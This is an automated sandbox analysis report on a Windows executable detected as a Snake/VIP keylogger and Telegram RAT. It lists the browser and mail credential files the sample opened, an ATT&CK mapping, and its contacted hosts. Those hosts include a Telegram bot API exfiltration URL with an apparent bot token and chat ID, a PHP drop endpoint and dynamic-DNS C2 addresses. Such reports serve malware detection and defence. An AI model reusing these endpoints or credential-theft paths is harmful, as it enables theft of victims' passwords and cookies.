Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x8M2g1Xxhz.exe PID: 7664, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\x8M2g1Xxhz.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3798081243.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x8M2g1Xxhz.exe PID: 7664, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x8M2g1Xxhz.exe PID: 7664, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.7440000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.x8M2g1Xxhz.exe.91dab0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.4850cbe.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.7440000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.49f0f20.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.x8M2g1Xxhz.exe.91dab0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.x8M2g1Xxhz.exe.484fd9e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x8M2g1Xxhz.exe PID: 7664, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	541 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	261 Virtualization/Sandbox Evasion	LSASS Memory	261 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Software Packing	Cached Domain Credentials	214 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
x8M2g1Xxhz.exe	60%	Virustotal		Browse
x8M2g1Xxhz.exe	88%	ReversingLabs	Win32.Spyware.Snakekeylogger
x8M2g1Xxhz.exe	100%	Avira	TR/Crypt.TPM.Gen
x8M2g1Xxhz.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
reallyfreegeoip.org	104.21.112.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE/sendDocument?chat_id=5830304904&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2012:14:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CFB000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CEC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	false	high
https://www.office.com/lB	x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CF6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CFB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?L	x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004BCA000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C0F000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot7365820770:AAFcSgCB-t8aplspIAYTFtpf48_ydah4lyE/sendDocument?chat_id=5830	x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.org	x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004CA5000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004B51000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	x8M2g1Xxhz.exe, 00000000.00000002.3799952990.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20a	x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004C35000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	x8M2g1Xxhz.exe, 00000000.00000002.3797924151.00000000049F0000.00000004.08000000.00040000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3797646088.000000000480F000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3798081243.0000000004BA0000.00000004.00000800.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000003.1365619132.000000000091D000.00000004.00000020.00020000.00000000.sdmp, x8M2g1Xxhz.exe, 00000000.00000002.3801283841.0000000007440000.00000004.08000000.00040000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.112.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588991
Start date and time:	2025-01-11 08:07:35 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	x8M2g1Xxhz.exe renamed because original name is a hash value
Original Sample Name:	8d5ad043ae91a80f57574f52b78402a7497b7377a29ebd2401c1f42ef0c41617.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 79% Number of executed functions: 230 Number of non-executed functions: 30
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:08:32	API Interceptor	10416859x Sleep call for process: x8M2g1Xxhz.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse
104.21.112.1	fqbVL4XxCr.exe	Get hash	malicious	FormBook	Browse	www.vilakodsiy.sbs/w7eo/
	BalphRTkPS.exe	Get hash	malicious	FormBook	Browse	www.kkpmoneysocial.top/86am/
	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/qzi3/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/w98i/
	wxl1r0lntg.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	beammp.com/phpmyadmin/
193.122.130.0	b6AGgIJ87g.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	dZMT94YYwO.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	4AMVusDMPP.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	tVuAoupHhZ.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	4287eV6mBc.exe	Get hash	malicious	AgentTesla	Browse	13.107.246.45
	Yv24LkKBY6.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	11626244731900027402.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	QQpQgSYkjW.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	13.107.246.45
	1r3DRyrX0T.exe	Get hash	malicious	DarkWatchman	Browse	13.107.246.45
	TBUjHBNHaD.exe	Get hash	malicious	DarkWatchman	Browse	13.107.246.45
	S7s4XhcN1G.exe	Get hash	malicious	DarkWatchman	Browse	13.107.246.45
	6043249381237528594.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	247624346306918832.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
reallyfreegeoip.org	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	b6AGgIJ87g.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.64.1
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	3qr7JBuNuX.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
api.telegram.org	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
